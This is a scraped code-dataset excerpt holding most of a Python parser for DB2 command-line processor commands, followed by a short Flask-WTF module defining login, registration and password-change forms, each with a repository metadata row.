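    #   SET TABLESPACE CONTAINERS FOR 2 USING (PATH '/db/ts2', FILE '/db/c0' 5120)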
def _parse_set_tape_position_command(self):
"""Parses a SET TAPE POSITION command"""
# SET TAPE POSITION already matched
if self._match('ON'):
self._expect_clp_string()
self._expect('TO')
self._expect(TT.NUMBER)
def _parse_set_util_impact_priority_command(self):
"""Parses a SET UTIL_IMPACT_PRIORITY command"""
# SET UTIL_IMPACT_PRIORITY already matched
self._expect('FOR')
self._expect(TT.NUMBER)
self._expect('TO')
self._expect(TT.NUMBER)
def _parse_set_workload_command(self):
"""Parses a SET WORKLOAD command"""
# SET WORKLOAD already matched
self._expect('TO')
self._expect_one_of(['AUTOMATIC', 'SYSDEFAULTADMWORKLOAD'])
def _parse_set_write_command(self):
"""Parses a SET WRITE command"""
# SET WRITE already matched
self._expect_one_of(['SUSPEND', 'RESUME'])
self._expect('FOR')
self._expect_one_of(['DATABASE', 'DB'])
def _parse_start_dbm_command(self):
"""Parses a START DBM command"""
# START [DATABASE MANAGER|DB MANAGER|DBM] already matched
if self._match('REMOTE'):
self._match('INSTANCE')
self._expect_clp_string()
self._expect_one_of(['ADMINNODE', 'HOSTNAME'])
self._expect_clp_string()
self._parse_login(optional=False, allowchange=False)
if self._match('ADMIN'):
self._expect('MODE')
if self._match_one_of(['USER', 'GROUP']):
self._expect(TT.IDENTIFIER)
self._match_sequence(['RESTRICTED', 'ACCESS'])
if self._match('PROFILE'):
self._expect_clp_string()
if self._match_one_of(['DBPARTITIONNUM', 'NODE']):
self._expect(TT.NUMBER)
if self._match('ADD'):
self._expect_one_of(['DBPARTITIONNUM', 'NODE'])
self._expect('HOSTNAME')
self._expect_clp_string()
self._expect('PORT')
self._expect(TT.NUMBER)
if self._match('COMPUTER'):
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
if self._match('NETNAME'):
self._expect_clp_string()
if self._match('LIKE'):
self._expect_one_of(['DBPARTITIONNUM', 'NODE'])
self._expect(TT.NUMBER)
elif self._match('WITHOUT'):
self._expect('TABLESPACES')
elif self._match('RESTART'):
if self._match('HOSTNAME'):
self._expect_clp_string()
if self._match('PORT'):
self._expect(TT.NUMBER)
if self._match('COMPUTER'):
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
if self._match('NETNAME'):
self._expect_clp_string()
elif self._match('STANDALONE'):
pass
def _parse_start_hadr_command(self):
"""Parses a START HADR command"""
# START HADR already matched
self._expect('ON')
self._expect_one_of(['DATABASE', 'DB'])
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
self._expect('AS')
if self._expect_one_of(['PRIMARY', 'STANDBY']).value == 'PRIMARY':
self._match_sequence(['BY', 'FORCE'])
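    # Illustrative statements accepted by the grammar above (examples only):
    #   START HADR ON DB sample AS PRIMARY BY FORCE
    #   START HADR ON DB sample USER dbuser USING dbpass AS STANDBY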
def _parse_stop_dbm_command(self):
"""Parses a STOP DBM command"""
# STOP [DATABASE MANAGER|DB MANAGER|DBM] already matched
if self._match('PROFILE'):
self._expect_clp_string()
if self._match('DROP'):
self._expect_one_of(['DBPARTITIONNUM', 'NODE'])
self._expect(TT.NUMBER)
else:
self._match('FORCE')
if self._match_one_of(['DBPARTITIONNUM', 'NODE']):
self._expect(TT.NUMBER)
def _parse_stop_hadr_command(self):
"""Parses a STOP HADR command"""
# STOP HADR already matched
self._expect('ON')
self._expect_one_of(['DATABASE', 'DB'])
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
def _parse_takeover_hadr_command(self):
"""Parses a TAKEOVER HADR command"""
# TAKEOVER HADR already matched
self._expect('ON')
self._expect_one_of(['DATABASE', 'DB'])
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
if self._match_sequence(['BY', 'FORCE']):
self._match_sequence(['PEER', 'WINDOW', 'ONLY'])
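    # Illustrative statement accepted by the grammar above (example only):
    #   TAKEOVER HADR ON DB sample BY FORCE PEER WINDOW ONLY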
def _parse_terminate_command(self):
"""Parses a TERMINATE command"""
# TERMINATE already matched
pass
def _parse_uncatalog_command(self):
"""Parses an UNCATALOG command"""
if self._match_one_of(['DATABASE', 'DB', 'NODE']):
self._expect_clp_string()
elif self._match('DCS'):
self._expect_one_of(['DATABASE', 'DB'])
self._expect_clp_string()
elif self._match('LDAP'):
self._expect_one_of(['DATABASE', 'DB', 'NODE'])
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
elif self._match_one_of(['USER', 'SYSTEM']):
self._expect_sequence(['ODBC', 'DATA', 'SOURCE'])
self._expect_clp_string()
elif self._match('ODBC'):
self._expect_sequence(['DATA', 'SOURCE'])
self._expect_clp_string()
else:
self._expected_one_of([
'DATABASE',
'DB',
'NODE',
'DCS',
'LDAP',
'USER',
'SYSTEM',
'ODBC',
])
def _parse_unquiesce_command(self):
"""Parses an UNQUIESCE command"""
# UNQUIESCE already matched
if self._match('INSTANCE'):
self._expect_clp_string()
elif self._match_one_of(['DATABASE', 'DB']):
pass
else:
self._expected_one_of(['DATABASE', 'DB', 'INSTANCE'])
def _parse_update_admin_cfg_command(self):
"""Parses an UPDATE ADMIN CFG command"""
# UPDATE ADMIN CONFIGURATION|CONFIG|CFG already matched
self._expect('USING')
while True:
self._expect(TT.IDENTIFIER)
self._expect_one_of([TT.NUMBER, TT.STRING, TT.IDENTIFIER])
if self._peek_one_of(['FOR', TT.TERMINATOR, TT.EOF]):
break
if self._match_sequence(['FOR', 'NODE']):
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
def _parse_update_alert_cfg_command(self):
"""Parses an UPDATE ALERT CFG command"""
# UPDATE ALERT CONFIGURATION|CONFIG|CFG already matched
self._expect('FOR')
if (
self._match_sequence(['DATABASE', 'MANAGER'])
or self._match_sequence(['DB', 'MANAGER'])
or self._match_one_of(['DBM', 'CONTAINERS', 'DATABASES', 'TABLESPACES'])
):
pass
elif (
self._match_sequence(['CONTAINER', TT.IDENTIFIER, 'FOR', TT.IDENTIFIER])
            or self._match_sequence(['TABLESPACE', TT.IDENTIFIER])
or self._match('DATABASE')
):
self._expect('ON')
self._expect_clp_string()
if self._match('USING'):
self._expect_clp_string()
if self._match('SET'):
while True:
self._expect_one_of(['ALARM', 'WARNING', 'SENSITIVITY', 'ACTIONSENABLED', 'THRESHOLDSCHECKED'])
self._expect_one_of([TT.NUMBER, 'YES', 'NO'])
if not self._match(','):
break
elif self._match('ADD'):
while True:
self._expect_one_of(['SCRIPT', 'TASK'])
self._expect_clp_string()
self._expect('TYPE')
if self._match('DB2'):
if (
self._match_sequence(['STATEMENT', 'TERMINATION', 'CHARACTER'])
or self._match_sequence(['STMT', 'TERM', 'CHAR'])
or self._match_sequence(['TERM', 'CHAR'])
):
self._expect_clp_string()
elif self._match_sequence(['OPERATING', 'SYSTEM']) or self._match('OS'):
if (
self._match_sequence(['COMMAND', 'LINE', 'PARAMETERS'])
or self._match('PARMS')
):
self._expect_clp_string()
else:
self._expected_one_of(['DB2', 'OS', 'OPERATING'])
self._expect_sequence(['WORKING', 'DIRECTORY'])
self._expect_clp_string()
self._expect('ON')
if self._expect_one_of(['WARNING', 'ALARM', 'ALLALERT', 'ATTENTION']).value == 'ATTENTION':
self._expect(TT.NUMBER)
if self._match('ON'):
self._expect_clp_string()
self._parse_login(optional=False, allowchange=False)
if not self._match(','):
break
else:
            # Bind 'update' on every branch: it was previously assigned only
            # for UPDATE, raising NameError for SET/ADD/DELETE further down.
            update = self._expect_one_of(['SET', 'ADD', 'UPDATE', 'DELETE']).value == 'UPDATE'
self._expect('ACTION')
while True:
self._expect_one_of(['SCRIPT', 'TASK'])
self._expect_clp_string()
self._expect('ON')
if self._expect_one_of(['WARNING', 'ALARM', 'ALLALERT', 'ATTENTION']).value == 'ATTENTION':
self._expect(TT.NUMBER)
if update:
while True:
self._expect('SET')
self._expect_one_of(['ALARM', 'WARNING', 'SENSITIVITY', 'ACTIONSENABLED', 'THRESHOLDSCHECKED'])
self._expect_one_of([TT.NUMBER, 'YES', 'NO'])
if not self._match(','):
break
if not self._match(','):
break
def _parse_update_alternate_server_command(self):
"""Parses an UPDATE ALTERNATE SERVER command"""
# UPDATE ALTERNATE SERVER already matched
self._expect('FOR')
if self._expect_one_of(['LDAP', 'DATABASE', 'DB']).value == 'LDAP':
self._expect_one_of(['DATABASE', 'DB'])
self._expect_clp_string()
self._expect('USING')
self._expect_one_of(['NODE', 'GWNODE'])
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
else:
self._expect_clp_string()
self._expect_sequence(['USING', 'HOSTNAME'])
self._expect_clp_string()
self._expect('PORT')
self._expect_clp_string()
def _parse_update_cli_cfg_command(self):
"""Parses an UPDATE CLI CFG command"""
# UPDATE CLI CONFIGURATION|CONFIG|CFG already matched
if self._match('AT'):
self._expect_one_of(['GLOBAL', 'USER'])
self._expect('LEVEL')
self._expect_sequence(['FOR', 'SECTION'])
self._expect_clp_string()
self._expect('USING')
while True:
self._expect(TT.IDENTIFIER)
self._expect_one_of([TT.NUMBER, TT.STRING, TT.IDENTIFIER])
if self._peek_one_of([TT.TERMINATOR, TT.EOF]):
break
def _parse_update_command_options_command(self):
"""Parses an UPDATE COMMAND OPTIONS command"""
# UPDATE COMMAND OPTIONS already matched
self._expect('USING')
while True:
option = self._expect_one_of([
'A', 'C', 'D', 'E', 'I', 'L', 'M', 'N',
'O', 'P', 'Q', 'R', 'S', 'V', 'W', 'Z',
]).value
value = self._expect_one_of(['ON', 'OFF']).value
if option in ('E', 'L', 'R', 'Z') and value == 'ON':
self._expect_clp_string()
if self._peek_one_of([TT.TERMINATOR, TT.EOF]):
break
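    # Illustrative statement (example only): options E, L, R and Z take a
    # trailing value when switched ON:
    #   UPDATE COMMAND OPTIONS USING C OFF Z ON output.txt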
def _parse_update_contact_command(self):
"""Parses an UPDATE CONTACT command"""
# UPDATE CONTACT already matched
self._expect_clp_string()
self._expect('USING')
while True:
if self._match('ADDRESS'):
self._expect_clp_string()
elif self._match('TYPE'):
self._expect_one_of(['EMAIL', 'PAGE'])
elif self._match('MAXPAGELEN'):
self._expect(TT.NUMBER)
elif self._match('DESCRIPTION'):
self._expect_clp_string()
else:
self._expected_one_of(['ADDRESS', 'TYPE', 'MAXPAGELEN', 'DESCRIPTION'])
if not self._match(','):
break
def _parse_update_contactgroup_command(self):
"""Parses an UPDATE CONTACTGROUP command"""
# UPDATE CONTACTGROUP already matched
self._expect_clp_string()
self._expect('(')
while True:
self._expect_one_of(['ADD', 'DROP'])
self._expect_one_of(['CONTACT', 'GROUP'])
self._expect_clp_string()
if not self._match(','):
break
self._expect(')')
if self._match('DESCRIPTION'):
self._expect_clp_string()
def _parse_update_db_cfg_command(self):
"""Parses an UPDATE DB CFG command"""
# UPDATE DATABASE|DB CONFIGURATION|CONFIG|CFG already matched
if self._match('FOR'):
self._expect_clp_string()
if self._match_one_of(['DBPARTITIONNUM', 'NODE']):
self._expect(TT.NUMBER)
self._expect('USING')
while True:
self._expect(TT.IDENTIFIER)
if self._match_one_of(['AUTOMATIC', 'MANUAL']):
pass
else:
self._expect_one_of([TT.NUMBER, TT.STRING, TT.IDENTIFIER])
self._match('AUTOMATIC')
if self._peek_one_of(['IMMEDIATE', 'DEFERRED', TT.TERMINATOR, TT.EOF]):
break
self._match_one_of(['IMMEDIATE', 'DEFERRED'])
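    # Illustrative statements accepted by the grammar above (examples only):
    #   UPDATE DB CFG FOR sample USING LOGBUFSZ 256 IMMEDIATE
    #   UPDATE DB CFG FOR sample USING SORTHEAP AUTOMATIC DEFERRED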
def _parse_update_dbm_cfg_command(self):
"""Parses an UPDATE DBM CFG command"""
# UPDATE DATABASE MANAGER|DB MANAGER|DBM CONFIGURATION|CONFIG|CFG already matched
self._expect('USING')
while True:
self._expect(TT.IDENTIFIER)
if self._match_one_of(['AUTOMATIC', 'MANUAL']):
pass
else:
self._expect_one_of([TT.NUMBER, TT.STRING, TT.IDENTIFIER])
self._match('AUTOMATIC')
if self._peek_one_of(['IMMEDIATE', 'DEFERRED', TT.TERMINATOR, TT.EOF]):
break
self._match_one_of(['IMMEDIATE', 'DEFERRED'])
def _parse_update_notification_list_command(self):
"""Parses an UPDATE NOTIFICATION LIST command"""
# UPDATE [HEALTH] NOTIFICATION [CONTACT] LIST already matched
first = True
while True:
if not self._match_one_of(['ADD', 'DROP']):
if not first:
break
else:
self._expected_one_of(['ADD', 'DROP'])
first = False
self._expect_one_of(['CONTACT', 'GROUP'])
self._expect_clp_string()
def _parse_update_history_command(self):
"""Parses an UPDATE HISTORY command"""
# UPDATE HISTORY already matched
self._expect_one_of(['FOR', 'EID'])
self._expect(TT.NUMBER)
self._expect('WITH')
if self._match('LOCATION'):
self._expect_clp_string()
self._expect_sequence(['DEVICE', 'TYPE'])
self._expect_one_of(['D', 'K', 'T', 'A', 'F', 'U', 'P', 'N', 'X', 'Q', 'O'])
elif self._match('COMMENT'):
self._expect_clp_string()
elif self._match('STATUS'):
self._expect_one_of(['A', 'I', 'E', 'D', 'X'])
else:
self._expected_one_of(['LOCATION', 'COMMENT', 'STATUS'])
def _parse_update_ldap_node_command(self):
"""Parses an UPDATE LDAP NODE command"""
# UPDATE LDAP NODE already matched
self._expect_clp_string()
if self._match('HOSTNAME'):
self._expect_clp_string()
if self._match('SVCENAME'):
self._expect_clp_string()
if self._match('WITH'):
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
def _parse_update_monitor_switches_command(self):
"""Parses an UPDATE MONITOR SWITCHES command"""
# UPDATE MONITOR SWITCHES already matched
self._expect('USING')
first = True
while True:
if not self._match_one_of(['BUFFERPOOL', 'LOCK', 'SORT', 'STATEMENT', 'TABLE', 'TIMESTAMP', 'UOW']):
if not first:
break
else:
self._expected_one_of(['BUFFERPOOL', 'LOCK', 'SORT', 'STATEMENT', 'TABLE', 'TIMESTAMP', 'UOW'])
first = False
self._expect_one_of(['OFF', 'ON'])
self._parse_db_partition_clause()
def _parse_update_xmlschema_command(self):
"""Parses an UPDATE XMLSCHEMA command"""
# UPDATE XMLSCHEMA already matched
self._parse_subschema_name()
self._expect('WITH')
self._parse_subschema_name()
self._match_sequence(['DROP', 'NEW', 'SCHEMA'])
def _parse_upgrade_db_command(self):
"""Parses an UPGRADE DB command"""
# UPGRADE DATABASE|DB already matched
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
# COMPOUND COMMANDS ######################################################
def _parse_command(self):
"""Parses a top-level CLP command in a DB2 script"""
# Ambiguity: Some CLP commands start with the same keywords as SQL
# statements (e.g. CREATE DATABASE and CREATE DATABASE PARTITION
# GROUP). Attempt to parse the statement as a CLP statement, rewind
# and try to parse as an SQL command if that fails. This is one reason
# for the message "The command was processed as an SQL statement
# because it was not a valid Command Line Processor command" in DB2;
# there are two very different and separate parsers, one for CLP which
# tries to parse a command first, which defers to the secondary SQL
# parser if it fails.
self._save_state()
try:
if self._match('ACTIVATE'):
self._expect_one_of(['DATABASE', 'DB'])
self._parse_activate_database_command()
elif self._match('ATTACH'):
self._parse_attach_command()
elif self._match('AUTOCONFIGURE'):
self._parse_autoconfigure_command()
elif self._match('BACKUP'):
self._expect_one_of(['DATABASE', 'DB'])
self._parse_backup_command()
elif self._match('CATALOG'):
self._parse_catalog_command()
elif self._match('CONNECT'):
self._parse_connect_command()
elif self._match('CREATE'):
if self._match_one_of(['DATABASE', 'DB']):
if self._match('PARTITION'):
raise ParseBacktrack()
self._parse_create_database_command()
elif self._match('TOOLS'):
self._expect('CATALOG')
self._parse_create_tools_catalog_command()
else:
raise ParseBacktrack()
elif self._match('DEACTIVATE'):
self._expect_one_of(['DATABASE', 'DB'])
self._parse_deactivate_database_command()
elif self._match('DETACH'):
self._parse_detach_command()
elif self._match('DISCONNECT'):
self._parse_disconnect_command()
elif self._match('DROP'):
if self._match_one_of(['DATABASE', 'DB']):
self._parse_drop_database_command()
elif self._match('TOOLS'):
self._expect('CATALOG')
self._parse_drop_tools_catalog_command()
else:
raise ParseBacktrack()
elif self._match('ECHO'):
self._parse_echo_command()
elif self._match('EXPORT'):
self._parse_export_command()
elif self._match('FORCE'):
self._expect('APPLICATION')
self._parse_force_application_command()
elif self._match('GET'):
if self._match('ADMIN'):
self._expect_one_of(['CONFIGURATION', 'CONFIG', 'CFG'])
self._parse_get_admin_cfg_command()
elif self._match('ALERT'):
self._expect_one_of(['CONFIGURATION', 'CONFIG', 'CFG'])
self._parse_get_alert_cfg_command()
elif self._match('CLI'):
self._expect_one_of(['CONFIGURATION', 'CONFIG', 'CFG'])
self._parse_get_cli_cfg_command()
elif self._match('CONNECTION'):
self._expect('STATE')
self._parse_get_connection_state_command()
elif self._match('CONTACTGROUP'):
self._parse_get_contactgroup_command()
elif self._match('CONTACTGROUPS'):
self._parse_get_contactgroups_command()
elif self._match('CONTACTS'):
self._parse_get_contacts_command()
elif self._match_one_of(['DATABASE', 'DB']):
if self._match_one_of(['CONFIGURATION', 'CONFIG', 'CFG']):
self._parse_get_db_cfg_command()
elif self._match('MANAGER'):
if self._match_one_of(['CONFIGURATION', 'CONFIG', 'CFG']):
self._parse_get_dbm_cfg_command()
elif self._match_sequence(['MONITOR', 'SWITCHES']):
self._parse_get_dbm_monitor_switches_command()
else:
self._expected_one_of(['CONFIGURATION', 'CONFIG', 'CFG', 'MONITOR'])
elif self._match('DBM'):
if self._match_one_of(['CONFIGURATION', 'CONFIG', 'CFG']):
self._parse_get_dbm_cfg_command()
elif self._match_sequence(['MONITOR', 'SWITCHES']):
self._parse_get_dbm_monitor_switches_command()
else:
self._expected_one_of(['CONFIGURATION', 'CONFIG', 'CFG', 'MONITOR'])
elif self._match('DESCRIPTION'):
self._expect_sequence(['FOR', 'HEALTH', 'INDICATOR'])
self._parse_get_description_for_health_indicator_command()
elif self._match('HEALTH'):
if self._match('NOTIFICATION'):
self._expect_sequence(['CONTACT', 'LIST'])
self._parse_get_notification_list_command()
elif self._match('SNAPSHOT'):
self._parse_get_health_snapshot_command()
else:
self._expected_one_of(['NOTIFICATION', 'SNAPSHOT'])
elif self._match('INSTANCE'):
self._parse_get_instance_command()
elif self._match('MONITOR'):
self._expect('SWITCHES')
self._parse_get_monitor_switches_command()
elif self._match('NOTIFICATION'):
self._expect('LIST')
self._parse_get_notification_list_command()
elif self._match('RECOMMENDATIONS'):
self._expect_sequence(['FOR', 'HEALTH', 'INDICATOR'])
self._parse_get_recommendations_for_health_indicator_command()
elif self._match('ROUTINE'):
self._parse_get_routine_command()
elif self._match('SNAPSHOT'):
self._parse_get_snapshot_command()
else:
raise ParseBacktrack()
elif self._match('IMPORT'):
self._parse_import_command()
elif self._match('INITIALIZE'):
self._expect('TAPE')
self._parse_initialize_tape_command()
elif self._match('INSPECT'):
self._parse_inspect_command()
elif self._match('INSTANCE'):
self._parse_instance_command()
elif self._match('LIST'):
if self._match('ACTIVE'):
self._expect('DATABASES')
self._parse_list_active_databases_command()
elif self._match('ADMIN'):
self._expect_sequence(['NODE', 'DIRECTORY'])
self._parse_list_node_directory_command()
elif self._match('APPLICATIONS'):
self._parse_list_applications_command()
elif self._match('COMMAND'):
self._expect('OPTIONS')
self._parse_list_command_options_command()
elif self._match_one_of(['DATABASE', 'DB']):
if self._match('DIRECTORY'):
self._parse_list_db_directory_command()
elif self._match('PARTITION'):
self._expect('GROUPS')
self._parse_list_database_partition_groups_command()
else:
self._expected_one_of(['DIRECTORY', 'PARTITION'])
elif self._match_one_of(['DBPARTITIONNUMS', 'NODES']):
self._parse_list_nodes_command()
elif self._match('DCS'):
if self._match('APPLICATIONS'):
self._parse_list_dcs_applications_command()
elif self._match('DIRECTORY'):
self._parse_list_dcs_directory_command()
else:
self._expected_one_of(['APPLICATIONS', 'DIRECTORY'])
elif self._match('DRDA'):
self._expect_sequence(['INDOUBT', 'TRANSACTIONS'])
self._parse_list_drda_indoubt_transactions_command()
elif self._match('HISTORY'):
self._parse_list_history_command()
elif self._match('INDOUBT'):
self._expect('TRANSACTIONS')
self._parse_list_indoubt_transactions_command()
elif self._match('NODE'):
self._expect('DIRECTORY')
self._parse_list_node_directory_command()
elif self._match_one_of(['USER', 'SYSTEM']):
self._expect_sequence(['ODBC', 'DATA', 'SOURCES'])
self._parse_list_odbc_data_sources_command()
elif self._match('ODBC'):
self._expect_sequence(['DATA', 'SOURCES'])
self._parse_list_odbc_data_sources_command()
elif self._match_one_of(['PACKAGES', 'TABLES']):
                    self._parse_list_tables_command()
elif self._match('TABLESPACES'):
if self._match('CONTAINERS'):
self._parse_list_tablespace_containers_command()
else:
self._parse_list_tablespaces_command()
elif self._match('UTILITIES'):
self._parse_list_utilities_command()
else:
self._expected_one_of([
'ACTIVE',
'ADMIN',
'APPLICATIONS',
'COMMAND',
'DATABASE',
'DB',
'DBPARTITIONNUMS',
'DCS',
'DRDA',
'HISTORY',
'INDOUBT',
'NODE',
'NODES',
'ODBC',
'PACKAGES',
'SYSTEM',
'TABLES',
'TABLESPACES',
'USER',
'UTILITIES',
])
elif self._match('LOAD'):
if self._match('QUERY'):
self._parse_load_query_command()
else:
self._parse_load_command()
elif self._match('MIGRATE'):
self._expect_one_of(['DATABASE', 'DB'])
self._parse_migrate_db_command()
elif self._match('ON'):
self._parse_on_command()
elif self._match('PING'):
self._parse_ping_command()
elif self._match_one_of(['PRECOMPILE', 'PREP']):
self._parse_precompile_command()
elif self._match('PRUNE'):
if self._match('HISTORY'):
self._parse_prune_history_command()
elif self._match('LOGFILE'):
self._parse_prune_logfile_command()
else:
self._expected_one_of(['HISTORY', 'LOGFILE'])
elif self._match('PUT'):
self._expect('ROUTINE')
self._parse_put_routine_command()
elif self._match('QUERY'):
self._expect('CLIENT')
self._parse_query_client_command()
elif self._match('QUIESCE'):
if self._match('TABLESPACES'):
self._parse_quiesce_tablespaces_command()
else:
self._parse_quiesce_command()
elif self._match('QUIT'):
self._parse_quit_command()
elif self._match('REBIND'):
self._parse_rebind_command()
elif self._match('RECOVER'):
self._expect_one_of(['DATABASE', 'DB'])
self._parse_recover_db_command()
elif self._match('REDISTRIBUTE'):
self._expect_sequence(['DATABASE', 'PARTITION', 'GROUP'])
self._parse_redistribute_database_partition_group_command()
elif self._match('REFRESH'):
if self._match('LDAP'):
self._parse_refresh_ldap_command()
else:
raise ParseBacktrack()
elif self._match('REGISTER'):
if self._match('XMLSCHEMA'):
self._parse_register_xmlschema_command()
elif self._match('XSROBJECT'):
self._parse_register_xsrobject_command()
else:
self._parse_register_command()
elif self._match('REORG'):
self._parse_reorg_command()
elif self._match('REORGCHK'):
self._parse_reorgchk_command()
elif self._match('RESET'):
if self._match('ADMIN'):
self._expect_one_of(['CONFIGURATION', 'CONFIG', 'CFG'])
self._parse_reset_admin_cfg_command()
elif self._match('ALERT'):
self._expect_one_of(['CONFIGURATION', 'CONFIG', 'CFG'])
self._parse_reset_alert_cfg_command()
elif self._match_one_of(['DATABASE', 'DB']):
if self._match('MANAGER'):
self._expect_one_of(['CONFIGURATION', 'CONFIG', 'CFG'])
self._parse_reset_dbm_cfg_command()
else:
self._expect_one_of(['CONFIGURATION', 'CONFIG', 'CFG'])
self._parse_reset_db_cfg_command()
elif self._match('DBM'):
self._expect_one_of(['CONFIGURATION', 'CONFIG', 'CFG'])
self._parse_reset_dbm_cfg_command()
elif self._match('MONITOR'):
self._parse_reset_monitor_command()
else:
self._expected_one_of([
'ADMIN',
'ALERT',
'DATABASE',
'DB',
'DBM',
'MONITOR',
])
elif self._match('RESTART'):
self._expect_one_of(['DATABASE', 'DB'])
self._parse_restart_db_command()
elif self._match('RESTORE'):
self._expect_one_of(['DATABASE', 'DB'])
self._parse_restore_db_command()
elif self._match('REWIND'):
self._expect('TAPE')
self._parse_rewind_tape_command()
elif self._match('ROLLFORWARD'):
self._expect_one_of(['DATABASE', 'DB'])
self._parse_rollforward_db_command()
elif self._match('RUNSTATS'):
self._parse_runstats_command()
elif self._match('SET'):
if self._match('CLIENT'):
self._parse_set_client_command()
elif self._match('RUNTIME'):
self._expect('DEGREE')
self._parse_set_runtime_degree_command()
elif self._match('SERVEROUTPUT'):
self._parse_set_serveroutput_command()
elif self._match('TABLESPACE'):
self._expect('CONTAINERS')
self._parse_set_tablespace_containers_command()
elif self._match('TAPE'):
self._expect('POSITION')
self._parse_set_tape_position_command()
elif self._match('UTIL_IMPACT_PRIORITY'):
self._parse_set_util_impact_priority_command()
elif self._match('WORKLOAD'):
self._parse_set_workload_command()
elif self._match('WRITE'):
self._parse_set_write_command()
else:
raise ParseBacktrack()
elif self._match('START'):
if self._match('HADR'):
self._parse_start_hadr_command()
elif self._match_one_of(['DATABASE', 'DB']):
self._expect('MANAGER')
self._parse_start_dbm_command()
elif self._match('DBM'):
self._parse_start_dbm_command()
else:
self._expected_one_of(['HADR', 'DATABASE', 'DB', 'DBM'])
elif self._match('STOP'):
if self._match('HADR'):
self._parse_stop_hadr_command()
elif self._match_one_of(['DATABASE', 'DB']):
self._expect('MANAGER')
self._parse_stop_dbm_command()
elif self._match('DBM'):
self._parse_stop_dbm_command()
else:
self._expected_one_of(['HADR', 'DATABASE', 'DB', 'DBM'])
elif self._match('TAKEOVER'):
self._parse_takeover_hadr_command()
elif self._match('TERMINATE'):
self._parse_terminate_command()
elif self._match('UNCATALOG'):
self._parse_uncatalog_command()
elif self._match('UNQUIESCE'):
self._parse_unquiesce_command()
elif self._match('UPDATE'):
if self._match('ADMIN'):
self._expect_one_of(['CONFIGURATION', 'CONFIG', 'CFG'])
self._parse_update_admin_cfg_command()
elif self._match('ALERT'):
self._expect_one_of(['CONFIGURATION', 'CONFIG', 'CFG'])
self._parse_update_alert_cfg_command()
elif self._match_sequence(['ALTERNATE', 'SERVER']):
self._parse_update_alternate_server_command()
elif self._match('CLI'):
self._expect_one_of(['CONFIGURATION', 'CONFIG', 'CFG'])
self._parse_update_cli_cfg_command()
elif self._match_sequence(['COMMAND', 'OPTIONS']):
self._parse_update_command_options_command()
elif self._match('CONTACT'):
self._parse_update_contact_command()
elif self._match('CONTACTGROUP'):
self._parse_update_contactgroup_command()
elif self._match_one_of(['DATABASE', 'DB']):
if self._match('MANAGER'):
self._expect_one_of(['CONFIGURATION', 'CONFIG', 'CFG'])
self._parse_update_dbm_cfg_command()
else:
self._expect_one_of(['CONFIGURATION', 'CONFIG', 'CFG'])
self._parse_update_db_cfg_command()
elif self._match('DBM'):
self._expect_one_of(['CONFIGURATION', 'CONFIG', 'CFG'])
self._parse_update_dbm_cfg_command()
elif (
self._match_sequence(['HEALTH', 'NOTIFICATION', 'CONTACT', 'LIST'])
or self._match_sequence(['NOTIFICATION', 'LIST'])
):
self._parse_update_notification_list_command()
elif self._match('HISTORY'):
self._parse_update_history_command()
elif self._match_sequence(['LDAP', 'NODE']):
self._parse_update_ldap_node_command()
elif self._match_sequence(['MONITOR', 'SWITCHES']):
self._parse_update_monitor_switches_command()
elif self._match('XMLSCHEMA'):
self._parse_update_xmlschema_command()
else:
raise ParseBacktrack()
elif self._match('UPGRADE'):
self._expect_one_of(['DATABASE', 'DB'])
self._parse_upgrade_db_command()
else:
raise ParseBacktrack()
except ParseBacktrack:
self._restore_state()
self._parse_statement()
else:
self._forget_state()
def _parse_top(self):
# Override _parse_top to make a CLP command the top of the parse tree
self._parse_command()
def _parse_init(self, tokens):
# Override _parse_init to set up the output lists (produces, consumes,
# etc.)
super(DB2ZOSScriptParser, self)._parse_init(tokens)
self.produces = []
self.consumes = []
self.connections = []
self.current_connection = None
self.current_user = None
def _save_state(self):
# Override _save_state to save the state of the output lists (produces,
# consumes, etc.)
self._states.append((
self._index,
self._level,
len(self._output),
self.current_schema,
self.current_user,
self.current_connection,
len(self.produces),
len(self.consumes),
len(self.connections),
))
def _restore_state(self):
# Override _restore_state to restore the state of the output lists
# (produces, consumes, etc.)
(
self._index,
self._level,
output_len,
self.current_schema,
self.current_user,
self.current_connection,
produces_len,
consumes_len,
logins_len,
) = self._states.pop()
del self.produces[produces_len:]
del self.consumes[consumes_len:]
del self.connections[logins_len:]
del self._output[output_len:]
| gpl-3.0 | 2,388,590,240,867,676,700 | 39.435933 | 143 | 0.47767 | false |
jp-security/LeagueStats | app/auth/forms.py | 1 | 1957 | from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, BooleanField, SubmitField, ValidationError, SelectField, IntegerField, DecimalField
from wtforms.validators import Required, Email, Length, Regexp, EqualTo, NumberRange
from ..models import User
class LoginForm(FlaskForm):
email = StringField('Email', validators=[Required(), Length(1, 64), Email()])
password = PasswordField('Password', validators=[Required()])
remember_me = BooleanField('Keep me logged in')
submit = SubmitField('Log In')
class RegistrationForm(FlaskForm):
email = StringField('Email', validators=[Required(), Length(1, 64), Email()])
username = StringField('Username', validators=[Required(), Length(1, 64), Regexp('^[A-Za-z][A-Za-z0-9_.]*$', 0,
'Usernames must have only letters, '
'numbers, dots or underscores')])
    password = PasswordField('Password', validators=[Required(), EqualTo('password2', message='Passwords must match.')])
password2 = PasswordField('Confirm password', validators=[Required()])
submit = SubmitField('Register')
def validate_email(self, field):
if User.query.filter_by(email=field.data).first():
raise ValidationError('Email already registered.')
def validate_username(self, field):
if User.query.filter_by(username=field.data).first():
            raise ValidationError('Username already in use.')
class ChangePasswordForm(FlaskForm):
old_password = PasswordField('Old Password', validators=[Required()])
password = PasswordField('New Password', validators=[Required(), EqualTo('password2', message='Passwords must match')])
password2 = PasswordField('Confirm new password', validators=[Required()])
submit = SubmitField('Updated Password')
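# Illustrative view-layer usage (a sketch; assumes a Flask request context):
#   form = LoginForm()
#   if form.validate_on_submit():   # runs the field validators
#       user = User.query.filter_by(email=form.email.data).first()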
| gpl-3.0 | -6,136,674,587,046,894,000 | 56.558824 | 131 | 0.662749 | false |
